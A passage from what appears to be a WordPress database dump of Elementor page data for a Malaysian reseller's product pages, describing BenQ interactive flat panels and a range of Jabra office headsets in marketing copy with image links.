further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.<\\/p><p><strong>Instant Plug and Play<\\/strong> <br \\/>RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and you\\u2019re all set to deliver compelling IFP touch-enhanced lessons.<\\/p><p><strong>Parental Control<\\/strong> <br \\/>BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c06c26c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdee68c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c5aa819\",\"elType\":\"widget\",\"settings\":{\"title\":\"Display Management Support\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5fcf286\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fcf021\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"137f9bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Multiple Display Administrator (MDA)<\\/strong><\\/p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on\\/off times, which helps to create hassle-free maintenance.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61de455\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5d041e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-05.jpg\",\"id\":2829}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85858fd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"630131a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c81a461\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-06.jpg\",\"id\":2830}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d09571\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7562601\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EasySetting<\\/strong><\\/p><p>Install Android\\u2122 apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65cdaaa\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b1c982\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ce849b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Over-the-Air Update (OTA)<\\/strong><\\/p><p>Upgrade your displays with the latest BenQ firmware via BenQ\\u2019s OTA update support to keep them running smoothly at all times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5ce7f62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3400375\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-07.jpg\",\"id\":2831}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fa35854\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"83a22ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4c554c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4965,2842,'_elementor_version','0.4'),(4992,2848,'_elementor_version','0.4'),(5187,2885,'_wc_apply_product',''),(5188,2885,'_yoast_wpseo_content_score','30'),(5037,1532,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 style=\\\"text-align: center;\\\"><strong>Jabra<\\/strong><\\/h1><h3 style=\\\"text-align: center;\\\">Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"03\",\"right\":\"03\",\"bottom\":\"03\",\"left\":\"03\",\"isLinked\":true},\"border_color\":\"#4f4f4f\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.919,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.081,\"margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"337d102\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1b419c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b34a6f3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65t<\\/strong><\\/h2><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"54e8d0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone wp-image-2852 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\\\" alt=\\\"\\\" width=\\\"163\\\" height=\\\"163\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93ab181\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2853 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 80<\\/strong><\\/h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75e<\\/strong><\\/h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93f376b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2854 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f104529\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2855 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\\\" alt=\\\"\\\" width=\\\"201\\\" height=\\\"201\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"ng-binding ng-scope\\\" style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75<\\/strong><\\/h2><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89a0b3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2856 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"434120f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2857 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\\\" alt=\\\"\\\" width=\\\"209\\\" height=\\\"209\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 40 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 30 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e63500c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"200\\\" height=\\\"200\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f45227\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"216\\\" height=\\\"216\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 SE<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ef4be63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2867 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\\\" alt=\\\"\\\" width=\\\"204\\\" height=\\\"204\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1a49967\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2870 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"249\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Engage 50<\\/strong><\\/h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3befa73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a85e5e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d60555\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Jabra Biz Wired Series<\\/strong><\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83ee6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"179\\\" height=\\\"179\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0fd4de1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2875 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\\\" alt=\\\"\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jabra BIZ 2400 II Mono 3-in-1<\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II DUO<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8703933\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" 